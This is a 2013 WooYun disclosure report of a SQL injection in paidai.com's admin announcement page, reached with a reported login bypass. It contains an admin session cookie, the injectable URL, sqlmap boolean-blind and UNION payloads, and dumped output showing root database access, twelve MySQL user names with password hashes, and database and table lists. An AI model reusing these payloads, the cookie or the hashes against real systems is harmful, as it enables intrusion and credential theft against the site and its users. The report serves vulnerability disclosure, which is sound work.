当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042623

漏洞标题:派代网ROOT权限SQL注射漏洞

相关厂商:派代网

漏洞作者: VIP

提交时间:2013-11-11 23:30

修复时间:2013-12-26 23:31

公开时间:2013-12-26 23:31

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-11: 细节已通知厂商并且等待厂商处理中
2013-11-15: 厂商已经确认,细节仅向厂商公开
2013-11-25: 细节向核心白帽子及相关领域专家公开
2013-12-05: 细节向普通白帽子公开
2013-12-15: 细节向实习白帽子公开
2013-12-26: 细节向公众公开

简要描述:

哇哈哈哈哈哈哈

详细说明:

是个后台注射点,接着上次找到的任意登录漏洞,进入后台
cookie(如果不能用就是过期了)

pai_check_report_interval=Mon%2C%2011%20Nov%202013%2012%3A46%3A21%20UTC; PHPSESSID=0psbkm1e56hf82qdnn1l8gdur0; bdshare_firstime=1384167347039; XForum_AuthCode=2003f97d4cdb5e219397ba5a9f01034e%255C%252A%252F3; XForum_AuthCode=2003f97d4cdb5e219397ba5a9f01034e%255C%252A%252F3; Hm_lvt_f4f85da7b4d1098cbdf448e41fea8458=1384167731; Hm_lpvt_f4f85da7b4d1098cbdf448e41fea8458=1384167731


注射点:
http://www.paidai.com/admin/announcement.php?act=edit&ann_id=9

漏洞证明:

---
Place: GET
Parameter: ann_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=edit&ann_id=9 AND 8157=8157
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: act=edit&ann_id=-1171 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NUL
L,CONCAT(0x71796d7a71,0x67664156676d4c6a5977,0x71776a7771),NULL#
---


web application technology: PHP 5.3.8
back-end DBMS: MySQL 5


current user:    'root@localhost'


current database:    'paidai'


current user is DBA:    True


同主机118用户,全服务器所有数据库沦陷(其中12个管理用户)

database management system users [12]:
[*] 'backup'@'localhost'
[*] 'cacti'@'localhost'
[*] 'epaidai'@'%'
[*] 'm_api_paidai'@'localhost'
[*] 'paidaicom'@'localhost'
[*] 'replication'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'u02'@'192.168.0.2'
[*] 'u03'@'192.168.0.3'
[*] 'u04'@'192.168.0.4'
[*] 'weipaishell'@'localhost'


SQL用户密码:

database management system users password hashes:
[*] backup [1]:
password hash: *D87050829EB02094C5C307278563AF7199DDED8F
[*] cacti [1]:
password hash: *9CDE1A09ED38FCFD4696D1AA82E4E1EE2F26270D
[*] epaidai [1]:
password hash: *7CFC397746A506C04BE9F973F03129017D816342
[*] m_api_paidai [1]:
password hash: *31371DE74CFF694701D115CE8D7A5A30628070D8
[*] paidaicom [1]:
password hash: *022A7CA5555E1CC1775E3EB618156F17B15C84A4
[*] replication [1]:
password hash: *27C496B116FBAD28EA871800EA4DBC0F1D539EF4
[*] root [1]:
password hash: *A24CF160387CC97807FB07D60333517509154FA3
[*] u02 [1]:
password hash: *666BADBE24C82DD924F4BE829BD156FF3B485FB4
[*] u03 [1]:
password hash: *666BADBE24C82DD924F4BE829BD156FF3B485FB4
[*] u04 [1]:
password hash: *5BA3E24CC3D212268EAB9C91E0D1235BEF5A93CC
[*] weipaishell [1]:
password hash: *C05A12A514871F6DD543947FDA3FE981BD4CB2F7


再查询了一下role,功能很多,权限特别大。
来看看数据库列表

available databases [8]:
[*] cacti
[*] information_schema
[*] mysql
[*] paidai
[*] paidai_weipai
[*] test
[*] wiki_hd
[*] xweibo


表(太多了,不全贴了)

[20:56:00] [INFO] the SQL query used returns 245 entries
[20:56:00] [INFO] retrieved: "e_accessstattab"
[20:56:00] [INFO] retrieved: "e_activity"
[20:56:01] [INFO] retrieved: "e_activity_leaveword"
[20:56:01] [INFO] retrieved: "e_activity_old"
[20:56:01] [INFO] retrieved: "e_activity_participants"
[20:56:01] [INFO] retrieved: "e_activity_participants_old"
[20:56:01] [INFO] retrieved: "e_activity_participants_trade"
[20:56:01] [INFO] retrieved: "e_activity_poll"
[20:56:02] [INFO] retrieved: "e_activity_topics"
[20:56:02] [INFO] retrieved: "e_admin_privileges"
[20:56:02] [INFO] retrieved: "e_android_stats_device"
[20:56:02] [INFO] retrieved: "e_app_auth"
[20:56:02] [INFO] retrieved: "e_app_client"
[20:56:02] [INFO] retrieved: "e_app_client_history"
[20:56:06] [INFO] retrieved: "e_app_client_uid"
[20:56:06] [INFO] retrieved: "e_app_devicetoken"
……

修复方案:

过滤啊

版权声明:转载请注明来源 VIP@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-11-15 16:05

厂商回复:

尽快修复,谢谢测试。

最新状态:

暂无